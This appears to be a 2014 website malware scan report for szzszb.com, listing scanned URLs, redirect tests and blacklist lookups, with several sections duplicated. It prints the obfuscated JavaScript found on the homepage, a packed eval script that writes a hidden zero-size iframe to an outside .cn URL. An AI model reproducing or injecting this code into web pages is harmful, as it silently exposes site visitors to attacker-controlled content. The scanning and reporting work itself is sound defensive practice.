Scanned pages/files
Request | Server response | Status |
http://szzszb.com/ | 200 OK Content-Length: 7396 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2:\\/\\/3.7\\/a\\" b=\\"0\\" 8=\\"0\\" 9=\\"0\\"><\\/1>");',12,12,'|iframe|http|url|src|document|writeln|cn|height|frameborder|GDxZxd|width'.split('|'),0,{}))
Antivirus reports:
| ||
http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://lib.sinaapp.com/js/swfobject/2.2/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://szzszb.com/gsjj | HTTP/1.1 302 Found Connection: close Location: /gsjj/ Server: kangle/3.2.8 | clean |
http://szzszb.com/gsjj/ | 200 OK Content-Length: 16251 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/js.js | 200 OK Content-Length: 1110 Content-Type: text/javascript | clean |
http://szzszb.com/gsjj/zizhizhengshu/ | 200 OK Content-Length: 6614 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/jquery.js | 200 OK Content-Length: 82339 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/scripts.js | 200 OK Content-Length: 5239 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/Zoom.js | 200 OK Content-Length: 23792 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/ZoomHTML.js | 200 OK Content-Length: 12119 Content-Type: text/javascript | clean |
http://szzszb.com/gsjj/shipinzhanshi/ | 200 OK Content-Length: 2854 Content-Type: text/html | clean |
http://szzszb.com/product | HTTP/1.1 302 Found Connection: close Location: /product/ Server: kangle/3.2.8 | clean |
http://szzszb.com/product/ | 200 OK Content-Length: 79449 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/easing.js | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/MogFocus.js | 200 OK Content-Length: 8757 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/png.js | 200 OK Content-Length: 1512 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szzszb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 May 2014 11:40:27 GMT
Server: kangle/3.2.8
Content-Length: 7396
Content-Type: text/html
Last-Modified: Sat, 03 May 2014 08:40:18 GMT
...7396 bytes of data.
GET / HTTP/1.1
Host: szzszb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 May 2014 11:40:27 GMT
Server: kangle/3.2.8
Content-Length: 7396
Content-Type: text/html
Last-Modified: Sat, 03 May 2014 08:40:18 GMT
...7396 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: szzszb.com
Referer: http://www.google.com/search?q=szzszb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: szzszb.com
Referer: http://www.google.com/search?q=szzszb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szzszb.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://szzszb.com/
Result: szzszb.com is not infected or malware details are not published yet.
Result: szzszb.com is not infected or malware details are not published yet.